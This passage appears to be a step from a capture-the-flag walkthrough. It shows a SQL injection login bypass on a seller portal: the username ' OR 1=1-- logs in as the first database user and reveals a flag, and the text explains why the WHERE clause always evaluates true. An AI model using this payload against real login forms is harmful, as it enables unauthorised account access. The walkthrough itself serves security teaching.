If admin doesn't exist, use OR 1=1 to match any row — you'll log in as the first seller in the database.
Command / Input
Username: ' OR 1=1--
Password: anything
Output
Login successful. Flag revealed: HackrGG{sql1_byp4ss_s3ll3r_p0rt4l}
⚑ OR 1=1 makes the WHERE clause always evaluate to true, returning the first row from the sellers table regardless of credentials.